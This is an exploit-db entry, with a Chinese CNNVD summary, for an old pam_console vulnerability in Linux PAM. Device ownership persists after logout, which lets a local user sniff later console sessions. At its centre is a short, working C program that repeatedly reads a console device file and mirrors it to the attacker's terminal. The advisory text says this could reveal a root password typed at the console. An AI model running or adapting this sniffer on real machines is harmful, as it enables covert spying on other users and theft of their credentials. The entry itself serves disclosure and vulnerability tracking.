https://www.exploit-db.com/exploits/19900
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200005-020

Linux系统下的pam_consolePAM模块有根据登陆用户修改多个设备文件属主的作用，但在用户退出登陆后，打开文件描述符仍将维护这些设备，随后的用户可以利用这个漏洞在登陆时做嗅探行为。

/*
source: http://www.securityfocus.com/bid/1176/info

A vulnerability exists in the pam_console PAM module, included as part of any Linux system running PAM. pam_console exists to own certain devices to users logging in to the console of a Linux machine. It is designed to allow only console users to utilize things such as sound devices. It will chown devices to users upon logging in, and chown them back to being owned by root upon logout. However, as certain devices do not have a 'hangup' mechanism, like a tty device, it is possible for a local user to continue to monitor activity on certain devices after logging out. This could allow an malicious user to sniff other users console sessions, and potentially obtain the root password if the root user logs in, or a user su's to root. They could also surreptitiously execute commands as the user on the console.
*/

#include <sys/fcntl.h>

main(int argc,char*argv[]) {
  char buf[80*24];
  int f=open(argv[1],O_RDWR);
  while (1) {
    lseek(f,0,0);
    read(f,buf,sizeof(buf));
    write(1,"33[2J33[H",7); // clear terminal, vt100/linux/ansi
    write(1,buf,sizeof(buf));
    usleep(10000);
  }
}

来源:BID
名称:1176
链接:http://www.securityfocus.com/bid/1176
来源:BUGTRAQ
名称:20000502pam_consolebug
链接:http://archives.neohapsis.com/archives/bugtraq/2000-05/0023.html